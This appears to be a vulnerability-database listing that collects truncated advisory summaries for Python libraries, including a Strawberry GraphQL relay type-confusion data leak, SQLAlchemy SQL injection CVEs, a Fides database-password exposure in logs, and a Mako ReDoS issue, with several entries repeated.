GHSA-5XH2-23CC-5JC6 Strawberry GraphQL has type resolution vulnerability in node interface that allows potential data leakage through incorrect type resolution

Vulnerability Summary A type confusion vulnerability exists in Strawberry GraphQL's relay integration that affects multiple ORM integrations Django, SQLAlchemy, Pydantic. The vulnerability occurs when multiple GraphQL types are mapped to the same underlying model while using the relay node...

Strawberry GraphQL has type resolution vulnerability in node interface that allows potential data leakage through incorrect type resolution

Vulnerability Summary A type confusion vulnerability exists in Strawberry GraphQL's relay integration that affects multiple ORM integrations Django, SQLAlchemy, Pydantic. The vulnerability occurs when multiple GraphQL types are mapped to the same underlying model while using the relay node...

Insufficient Type Distinction

Overview strawberry-graphql is an A library for creating GraphQL APIs Affected versions of this package are vulnerable to Insufficient Type Distinction in the relay integration that affects multiple ORM integrations Django, SQLAlchemy, Pydantic. An attacker can access unauthorized data by queryin...

PT-2025-4385 · Unknown +2 · Sqlalchemy +3

Name of the Vulnerable Software and Affected Versions: Strawberry GraphQL versions 0.182.0 through 0.257.0 Description: A type confusion vulnerability exists in Strawberry GraphQL's relay integration, affecting multiple ORM integrations, including Django, SQLAlchemy, and Pydantic. This issue occu...

RHSA-2012:0369 Red Hat Security Advisory: python-sqlalchemy security update

Bulletin has no description...

OPENSUSE-SU-2024:11211-1 python-SQLAlchemy-doc-1.4.22-1.2 on GA media

These are all security issues fixed in the python-SQLAlchemy-doc-1.4.22-1.2 package on the GA media of openSUSE Tumbleweed...

RHEL 7 : python-sqlalchemy (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 7 host has one or more packages installed that are affected by a vulnerability that has been acknowledged by the vendor but will not be patched. - python-sqlalchemy: SQL Injection when the groupby parameter can be controlled CVE-2019-7548 Note that Nessus has no...

RHEL 6 : calamari-server (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 6 host has one or more packages installed that are affected by a vulnerability that has been acknowledged by the vendor but will not be patched. - python-sqlalchemy: SQL Injection when the orderby parameter can be controlled CVE-2019-7164 Note that Nessus has no...

RHEL 6 : python-sqlalchemy (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 6 host has one or more packages installed that are affected by a vulnerability that has been acknowledged by the vendor but will not be patched. - python-sqlalchemy: SQL Injection when the groupby parameter can be controlled CVE-2019-7548 Note that Nessus has no...

Partial Password Leakage

ethyca-fides is vulnerable to Partial Password Leakage. The vulnerability is due to improper sanitization/redaction of the SQLAlchemy password string in error logs, which partially exposes the database password when special characters are used inside the password...

CVE-2024-34715

Fides is an open-source privacy engineering platform. The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes special characters such as @ and $, webserver...

CVE-2024-34715 Partial Password Exposure Vulnerability in Fides Webserver Logs

Fides is an open-source privacy engineering platform. The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes special characters such as @ and $, webserver...

CVE-2024-34715

CVE-2024-34715 affects the Fides webserver, where an improper escaping of the SQLAlchemy password string can cause the database password to be partially exposed in webserver logs when the password contains characters like @ or $. This is due to insufficient escaping of the password in the connect...

CVE-2024-34715 Partial Password Exposure Vulnerability in Fides Webserver Logs

Fides is an open-source privacy engineering platform. The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes special characters such as @ and $, webserver...

GHSA-8CM5-JFJ2-26Q7 Fides Webserver Logs Hosted Database Password Partial Exposure Vulnerability

The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes special characters such as @ and $, webserver startup fails and the part of the password following the...

Fides Webserver Logs Hosted Database Password Partial Exposure Vulnerability

The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes special characters such as @ and $, webserver startup fails and the part of the password following the...

PT-2024-26129 · Unknown +1 · Sqlalchemy +2

Name of the Vulnerable Software and Affected Versions: Fides versions prior to 2.37.0 Description: The Fides webserver requires a connection to a hosted PostgreSQL database for persistent storage of application data. If the password used by the webserver for this database connection includes...

Huawei EulerOS: Security Advisory for python-mako (EulerOS-SA-2024-1701)

The remote host is missing an update for the Huawei EulerOS SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

EulerOS Virtualization 3.0.6.0 : python-mako (EulerOS-SA-2024-1701)

According to the versions of the python-mako packages installed, the EulerOS Virtualization installation on the remote host is affected by the following vulnerabilities : - Sqlalchemy mako before 1.2.2 is vulnerable to Regular expression Denial of Service when using the Lexer class to parse. This...

RHEL 7 : python-sqlalchemy (Unpatched Vulnerability)

The remote Redhat Enterprise Linux 7 host has one or more packages installed that are affected by multiple vulnerabilities that have been acknowledged by the vendor but will not be patched. - python-sqlalchemy: SQL Injection when the orderby parameter can be controlled CVE-2019-7164 - SQLAlchemy...